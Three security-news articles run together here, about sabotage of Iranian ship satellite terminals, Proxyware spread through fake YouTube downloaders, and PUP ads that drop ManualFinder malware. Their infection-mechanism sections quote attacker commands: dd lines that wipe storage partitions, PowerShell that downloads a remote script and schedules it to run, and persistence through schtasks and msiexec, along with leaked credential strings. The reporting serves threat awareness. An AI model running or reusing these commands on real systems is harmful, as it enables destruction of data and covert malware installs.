A sophisticated campaign of cyber sabotage unfolded against Iran’s maritime communications infrastructure in late August 2025, cutting off dozens of vessels from vital satellite links and navigation aids.

Rather than targeting each ship individually—a logistical nightmare across international waters—the attackers infiltrated Fanava Group, the IT provider responsible for satellite communications to Iran’s sanctioned tanker fleets.

By compromising the company’s outdated iDirect Falcon terminals, they gained root access to Linux systems running kernel 2.6.35 and mapped the entire constellation of vessels through a centralized MySQL database.

The initial breach vector appears to have exploited unpatched vulnerabilities in legacy Falcon management consoles, allowing the threat actors to execute privileged commands and exfiltrate network mappings.

Once inside, they harvested modem serial numbers, network IDs, and IP phone system configurations in plain text, including credentials such as “1402@Argo” and “1406@Diamond.”

These details were then weaponized to orchestrate a synchronized blackout: email and FBB SIM communications failed, automated weather updates ceased, and port coordination signals vanished almost instantaneously.

Nariman Gharib researchers identified that the campaign, dubbed Lab-Dookhtegan, was not a one-off disruption.

Email logs dating back to May revealed persistent access and periodic “Node Down” tests, confirming that the attackers maintained control over the networks for months before launching a destructive finale.

On August 18, they executed a “scorched earth” sequence, overwriting multiple storage partitions on satellite modems with zeroed data, rendering remote recovery impossible.

By crippling Iran’s sanctioned fleets—NITC and IRISL—at a time when covert oil transfers to China intensify, the attackers dealt a blow to the country’s sanctions-evasion capabilities.

Without communication links, tankers risk drifting off-course or becoming easy targets for boarding and seizure. The operation’s precision underscores a deep reconnaissance phase, allowing the threat actors to deliver maximally disruptive payloads at the worst strategic moment.

Infection Mechanism

The malware’s infection mechanism relied on a multi-stage approach: initial access through unprotected management ports, lateral movement via SSH keys harvested from MySQL dumps, and deployment of destructive scripts.

After gaining root on a compromised Falcon console, the attackers executed commands akin to:-

dd if=/dev/zero of=/dev/mmcblk0p1 bs=1M
dd if=/dev/zero of=/dev/mmcblk0p2 bs=1M

These commands systematically wiped primary storage partitions and recovery slices, ensuring the terminal’s firmware and configurations were irrecoverable without physical intervention.

Simultaneously, SQL queries extracted the fleet blueprint:-

SELECT serial_number, vessel_name, network_id
FROM modems;

Armed with this data, the attackers automated credential injection and shutdown sequences across 64 vessels with a single orchestration script.

By embedding malicious cron entries, they achieved both persistence and timed execution, triggering the blackout at a moment calculated to maximize operational chaos.

This infection chain highlights the importance of isolating management interfaces and enforcing strict patch regimes on critical satellite communication systems.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Hackers Sabotage Iranian Ships Using Maritime Communications Terminals in Its MySQL Database appeared first on Cyber Security News.

Cybersecurity researchers have observed a surge in deceptive sites masquerading as YouTube video download services to deliver Proxyware malware in recent weeks.

Victims seeking to grab videos in MP4 format are redirected through ad pages that sporadically present a download link for a seemingly legitimate utility called “WinMemoryCleaner.”

Behind this innocuous facade, however, lies a multi-stage installer that ultimately deploys Proxyware and covertly enslaves the system’s network bandwidth.

The initial download executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Files directory before triggering an update script via WinMemoryCleanerUpdate.bat.

Once executed, WinMemoryCleaner.exe performs environment checks to evade virtual machines or sandbox analysis, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript component from a remote server.

ASEC analysts identified this technique as a refined evolution of previous Proxyware campaigns, noting the attacker’s reliance on GitHub for hosting intermediary tools.

Subsequent stages involve the registration of two scheduled tasks—“Schedule Update” and “WindowsDeviceUpdates”—that ensure the JavaScript runs periodically under Node.js.

This script communicates basic system information to a command-and-control server and awaits directives, which can include fetching additional scripts or initiating the final Proxyware installation.

ASEC researchers noted that the actor has pivoted from distributing only DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.

The impact of this campaign is twofold: affected systems experience degraded network performance, and the attacker monetizes the stolen bandwidth through affiliate programs.

Proxyware programs typically share idle network throughput, promising remuneration to end users, but com promise victims unwittingly supply bandwidth without compensation.

In regions with high adoption of streaming services, such as South Korea, the campaign’s reach has grown significantly, prompting warnings from major AV vendors.

Infection Mechanism

A deeper examination of the infection mechanism reveals the pivotal role of the PowerShell script delivered by WinMemoryCleaner.exe.

The script begins with a stealthy installation of Node.js:-

Invoke-WebRequest -Uri "https://nodejs.org/dist/v14.17.0/node-v14.17.0-x64.msi" -OutFile "$env:TEMP\node.msi"
Start-Process msiexec.exe -ArgumentList '/i',$env:TEMP + '\node.msi','/qn' -Wait

Once Node.js is in place, the script downloads pas.js from a cloudfront URL and registers it:-

$jsUrl = "https://d14vmbql41e8a5.cloudfront.net/pas.js"
Invoke-WebRequest -Uri $jsUrl -OutFile "$env:ProgramFiles\WinMemoryCleaner\p.js"
schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Update" /TR "node $env:ProgramFiles\WinMemoryCleaner\p.js"

Continuous execution of the JavaScript component under Node.js enables dynamic updates and final payload deployment, making eradication challenging without specialized tools.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts appeared first on Cyber Security News.

In recent weeks, cybersecurity investigators have uncovered a novel campaign in which hackers leverage seemingly benign potentially unwanted program (PUP) advertisements to deliver stealthy Windows malware.

The lure typically begins with ads promoting free PDF tools or desktop assistants that redirect victims to spoofed download sites.

Once users click through, a scheduled task silently retrieves a JavaScript loader from a temporary directory and executes it via Microsoft HTML Application Host (MSHTA).

This sequence installs a decoy application—ManualFinder—designed to appear legitimate while establishing footholds in target environments.

The decoy’s innocuous functionality masks a far more insidious objective. When run, ManualFinder requests no user interaction beyond the initial installation, quietly opening ports and relaying commands to remote infrastructure.

Expel analysts identified that the JavaScript loader reaches out to domains such as mka3e8.com and 5b7crp.com, previously associated with residential proxy services, indicating a broader scheme to conscript infected machines into proxy networks.

While initial infections have been linked to OneStart Browser installs, researchers observed that AppSuite-PDF and PDFEditor installers follow identical patterns, each signed by dubious code-signing certificates from entities like “GLINT SOFTWARE SDN. BHD.”

Expel researchers identified that the malware campaign’s impact extends beyond proxying. In certain environments, PDFEditor installations prompt users to consent to residential proxy use in exchange for free editing capabilities, effectively monetizing unsuspecting endpoints.

Other instances show the decoy apps modifying browser profiles and harvesting stored cookies, suggesting secondary data-exfiltration objectives.

By the time defenders detect unusual MSHTA invocations or node.exe processes running hidden JavaScript, the adversary has often already established persistence and network outposts.

In total, investigators have cataloged over 70 unique JavaScript variants, all reaching out to the same malicious domains.

Code snippets embedded in scheduled-task definitions reveal how persistence is maintained:-

schtasks /Create /TN "ManualFinderTask" /TR "mshta.exe \"C:\Users\<user>\AppData\Local\Temp\<guid>.js\"" /SC DAILY /ST 03:00  

The loader then executes:-

cmd[.]exe /d /s /c "msiexec /qn /i \"C:\Users\<user>\AppData\Local\TEMP\ManualFinder-v2.0.196.msi\""  

Infection Mechanism

Delving deeper into the infection mechanism, the campaign exploits Windows scripting hosts and MSI installer features to achieve near-undetectable deployment.

The sequence begins when the scheduled task runs under the context of the SYSTEM-level svchost service, launching node.exe with a randomized JavaScript filename (e.g., 9b9797f4-274c-fbb9-81ae-3b4f33b7010a.js).

This script downloads the ManualFinder MSI from the attacker’s server and installs it with quiet flags (/qn /n) to suppress any user interface.

Because msiexec runs under cmd[.]exe with disabled autorun (/d) and custom quote handling (/s), traditional EDR alerts tied to user applications are often bypassed.

Once installed, the malware registers its own service and scheduled tasks to re-execute the JavaScript loader at regular intervals, ensuring re-infection even after removal attempts.

This illustrates the MSHTA invocation code that enables this stealthy execution.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Hackers Using PUP Advertisements to Silently Drop Windows Malware appeared first on Cyber Security News.